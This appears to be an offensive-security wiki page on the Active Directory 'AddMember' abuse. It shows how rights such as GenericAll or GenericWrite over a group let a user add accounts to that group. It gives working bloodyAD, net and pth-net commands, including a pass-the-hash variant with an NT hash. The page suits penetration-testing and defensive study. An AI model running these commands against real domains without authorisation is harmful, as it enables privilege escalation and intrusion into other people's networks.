AddMember
This abuse can be carried out when controlling an object that has a GenericAll
, GenericWrite
, Self
, AllExtendedRights
or Self-Membership
, over the target group.
Alternative #1: using bloodyAD
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" add groupMember $TargetGroup
bloodyAD --host 10.1.1.1 -d test-dom -u privilegedUser -p 'Passw0rd!' add groupMember 'New_Secret_Group' myUser
## Verify
bloodyAD --host 10.1.1.1 -d test-dom -u privilegedUser -p 'Passw0rd!' get membership myUser | grep sAMA
Alternative #2: using net, a tool for the administration of samba and cifs/smb clients. The pth-toolkit can also be used to run net commands with pass-the-hash.
# With net and cleartext credentials (will be prompted)
net rpc group addmem $TargetGroup $TargetUser -U $DOMAIN/$ControlledUser -S $DomainController
# With net and cleartext credentials
net rpc group addmem $TargetGroup $TargetUser -U $DOMAIN/$ControlledUser%$Password -S $DomainController
# With Pass-the-Hash
pth-net rpc group addmem $TargetGroup $TargetUser -U $DOMAIN/$ControlledUser%ffffffffffffffffffffffffffffffff:$NThash -S $DomainController
Last updated
Was this helpful?